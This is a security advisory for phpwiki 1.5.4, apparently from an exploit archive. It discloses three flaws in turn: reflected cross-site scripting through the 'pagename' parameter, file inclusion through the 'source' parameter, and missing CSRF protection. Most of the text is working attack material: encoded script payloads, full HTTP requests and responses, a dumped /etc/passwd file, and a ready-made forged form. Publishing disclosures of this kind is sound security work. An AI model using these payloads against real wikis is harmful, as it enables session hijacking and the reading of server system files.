200 lines
No EOL
8.7 KiB
Text
200 lines
No EOL
8.7 KiB
Text
# Title: phpwiki 1.5.4 - Cross Site Scripting / Local File Inclusion
|
|
# Date: 29.08.15
|
|
# Vendor: sourceforge.net/projects/phpwiki/
|
|
# Affected versions: => 1.5.4 (current)
|
|
# Tested on: Apache2.2 / PHP5 / Deb32
|
|
# Author: Smash_
|
|
# Contact: smash [at] devilteam.pl
|
|
|
|
|
|
1/ Cross Site Scripting
|
|
|
|
Cross-site scripting vulnerability in user preferences allows remote unauthenticated users to inject arbitrary web script by injecting code via GET or POST 'pagename' parameter.
|
|
|
|
Example url:
|
|
http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--
|
|
|
|
Example request:
|
|
POST /phpwiki/index.php/UserPreferences HTTP/1.1
|
|
Host: 192.168.0.10
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie: folder_p-tbx=Open; PHPSESSID=3ko4uprjgmnjtmfkes3dnh0gk4; PhpWiki_WIKI_ID=admin
|
|
Connection: keep-alive
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 260
|
|
|
|
pref%5Bemail%5D=&pref%5BnotifyPages%5D=&pref%5Btheme%5D=&pref%5Blang%5D=&pref%5BeditHeight%5D=22&pref%5BeditWidth%5D=80&pref%5BtimeOffset%5D=0&pagename=UserPreferencesabc%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--&action=browse
|
|
|
|
Example response:
|
|
HTTP/1.1 200 OK
|
|
Date: Sat, 29 Aug 2015 21:30:47 GMT
|
|
Server: Apache/2.2.22 (Debian)
|
|
X-Powered-By: PHP/5.4.41-0+deb7u1
|
|
Vary: Accept-Encoding
|
|
Content-Length: 16114
|
|
Keep-Alive: timeout=5, max=100
|
|
Connection: Keep-Alive
|
|
Content-Type: text/html
|
|
(...)
|
|
<script type="text/javascript">
|
|
<!--//
|
|
var rateit_imgsrc = '/phpwiki/themes/wikilens/images/RateIt';
|
|
var rateit_action = 'RateIt';
|
|
// --></script>
|
|
<script type="text/javascript">
|
|
<!--//
|
|
var data_path = '/phpwiki';
|
|
var pagename = 'UserPreferencesabc</script><script>alert(document.cookie)</script><!--';
|
|
var script_url= '/phpwiki/index.php';
|
|
var stylepath = data_path+'/themes/Sidebar/';
|
|
var folderArrowPath = '/phpwiki/themes/default/images';
|
|
var use_path_info = true;
|
|
// --></script>
|
|
</head>
|
|
(...)
|
|
|
|
|
|
2/ Local File Inclusion
|
|
|
|
Directory traversal vulnerability in file load section allows authenticated attackers to read arbitrary files via POST or GET 'source' parameter. Content of file will be later available in created page.
|
|
|
|
Example url:
|
|
http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration?action=loadfile&overwrite=1&source=/etc/group
|
|
|
|
#1 - Example request:
|
|
POST /phpwiki/index.php/PhpWikiAdministration HTTP/1.1
|
|
Host: 192.168.0.10
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration
|
|
Cookie: folder_p-tbx=Open; folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625
|
|
Connection: keep-alive
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 76
|
|
|
|
action=loadfile&overwrite=&pagename=PhpWikiAdministration&source=/etc/passwd
|
|
|
|
#1 - Example response:
|
|
HTTP/1.1 200 OK
|
|
Date: Sat, 29 Aug 2015 22:09:36 GMT
|
|
Server: Apache/2.2.22 (Debian)
|
|
X-Powered-By: PHP/5.4.41-0+deb7u1
|
|
Vary: Accept-Encoding
|
|
Keep-Alive: timeout=5, max=100
|
|
Connection: Keep-Alive
|
|
Content-Type: text/html
|
|
Content-Length: 3534
|
|
(...)
|
|
<a id="contentTop"></a>
|
|
<h1 class="firstHeading">Loading “/etc/passwd”</h1>
|
|
<div id="bodyContent">
|
|
<em><a href="passwd" class="wiki">passwd</a></em><span> from “plain file /etc/passwd” content is identical to current version 1 - no new revision created</span><p><strong>Complete.</strong></p>
|
|
<p>Return to <a href="PhpWikiAdministration" class="wiki">PhpWikiAdministration</a></p>
|
|
(...)
|
|
|
|
#2 - Example request:
|
|
GET /phpwiki/index.php/passwd HTTP/1.1
|
|
Host: 192.168.0.10
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration
|
|
Cookie: folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625
|
|
Connection: keep-alive
|
|
|
|
#2 - Example response:
|
|
HTTP/1.1 200 OK
|
|
Date: Sat, 29 Aug 2015 22:10:34 GMT
|
|
Server: Apache/2.2.22 (Debian)
|
|
X-Powered-By: PHP/5.4.41-0+deb7u1
|
|
ETag: W/"97df6cb9b2668497eb1a804ab9c18eb8"
|
|
Last-Modified: Sat, 29 Aug 2015 22:09:55 GMT
|
|
Cache-Control: must-revalidate
|
|
Expires: Sat, 29 Aug 2015 22:10:14 GMT
|
|
Vary: Cookie
|
|
Keep-Alive: timeout=5, max=100
|
|
Connection: Keep-Alive
|
|
Content-Type: text/html
|
|
Content-Length: 22599
|
|
(...)
|
|
|
|
<div class="wikitext"><p>root:x:0:0:root:/root:/bin/bash
|
|
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|
|
bin:x:2:2:bin:/bin:/bin/sh
|
|
sys:x:3:3:sys:/dev:/bin/sh
|
|
sync:x:4:65534:sync:/bin:/bin/sync
|
|
games:x:5:60:games:/usr/games:/bin/sh
|
|
man:x:6:12:man:/var/cache/man:/bin/sh
|
|
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
|
|
mail:x:8:8:mail:/var/mail:/bin/sh
|
|
<a href="news:x:9:9:news:/var/spool/news:/bin/sh" target="_blank" class="namedurl"><span style="white-space: nowrap"><img src="/phpwiki/themes/Sidebar/images/url.png" alt="" class="linkicon" />news:x:9:9:news:/var/spool/news:/bin/sh</span></a>
|
|
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
|
|
proxy:x:13:13:proxy:/bin:/bin/sh
|
|
www-data:x:33:33:www-data:/var/www:/bin/sh
|
|
backup:x:34:34:backup:/var/backups:/bin/sh
|
|
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
|
|
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
|
|
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
|
|
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
|
|
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
|
|
mysql:x:101:103:MySQL Server<sub>,:/nonexistent:/bin/false
|
|
messagebus:x:102:106::/var/run/dbus:/bin/false
|
|
colord:x:103:107:colord colour management daemon</sub>,:/var/lib/colord:/bin/false
|
|
usbmux:x:104:46:usbmux daemon<sub>,:/home/usbmux:/bin/false
|
|
miredo:x:105:65534::/var/run/miredo:/bin/false
|
|
ntp:x:106:113::/home/ntp:/bin/false
|
|
Debian-exim:x:107:114::/var/spool/exim4:/bin/false
|
|
arpwatch:x:108:117:ARP Watcher</sub>,:/var/lib/arpwatch:/bin/sh
|
|
avahi:x:109:118:Avahi mDNS daemon<sub>,:/var/run/avahi-daemon:/bin/false
|
|
beef-xss:x:110:119::/var/lib/beef-xss:/bin/false
|
|
dradis:x:111:121::/var/lib/dradis:/bin/false
|
|
pulse:x:112:122:<span style="text-decoration: underline" class="wikiunknown"><span>PulseAudio</span><a href="PulseAudio?action=create" title="Create: PulseAudio" onmouseover="window.status="Create: PulseAudio"; return true;" onmouseout="window.status='';return true;" rel="nofollow">?</a></span> daemon</sub>,:/var/run/pulse:/bin/false
|
|
speech-dispatcher:x:113:29:Speech Dispatcher<sub>,:/var/run/speech-dispatcher:/bin/sh
|
|
haldaemon:x:114:124:Hardware abstraction layer</sub>,:/var/run/hald:/bin/false
|
|
iodine:x:115:65534::/var/run/iodine:/bin/false
|
|
postgres:x:116:127:PostgreSQL administrator<sub>,:/var/lib/postgresql:/bin/bash
|
|
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
|
|
redsocks:x:118:128::/var/run/redsocks:/bin/false
|
|
snmp:x:119:129::/var/lib/snmp:/bin/false
|
|
stunnel4:x:120:130::/var/run/stunnel4:/bin/false
|
|
statd:x:121:65534::/var/lib/nfs:/bin/false
|
|
sslh:x:122:133::/nonexistent:/bin/false
|
|
Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false
|
|
rtkit:x:124:136:<span style="text-decoration: underline" class="wikiunknown"><span>RealtimeKit</span><a href="RealtimeKit?action=create" title="Create: RealtimeKit" onmouseover="window.status="Create: RealtimeKit"; return true;" onmouseout="window.status='';return true;" rel="nofollow">?</a></span></sub>,:/proc:/bin/false
|
|
saned:x:125:137::/home/saned:/bin/false
|
|
devil:x:1000:1001:devil<sub>,:/home/devil:/bin/bash
|
|
debian-tor:x:126:138::/var/lib/tor:/bin/false
|
|
privoxy:x:127:65534::/etc/privoxy:/bin/false
|
|
redis:x:128:139:redis server</sub>,:/var/lib/redis:/bin/false</p>
|
|
</div>
|
|
(...)
|
|
|
|
|
|
3/ Cross Site Request Forgery
|
|
|
|
Since there is no csrf protection in application, remote attacker is able to trigger specific actions.
|
|
|
|
PoC:
|
|
<html>
|
|
<!-- Change settings / XSS -->
|
|
<body>
|
|
<form action="http://192.168.0.10/phpwiki/index.php/UserPreferences" method="POST">
|
|
<input type="hidden" name="pref[email]" value="" />
|
|
<input type="hidden" name="pref[notifyPages]" value="" />
|
|
<input type="hidden" name="pref[theme]" value="" />
|
|
<input type="hidden" name="pref[lang]" value="" />
|
|
<input type="hidden" name="pref[editHeight]" value="22" />
|
|
<input type="hidden" name="pref[editWidth]" value="80" />
|
|
<input type="hidden" name="pref[timeOffset]" value="0" />
|
|
<input type="hidden" name="pagename" value="UserPreferencesabc</script><script>alert(document.cookie)</script><!--" />
|
|
<input type="hidden" name="action" value="browse" />
|
|
<input type="submit" value="Go" />
|
|
</form>
|
|
</body>
|
|
</html> |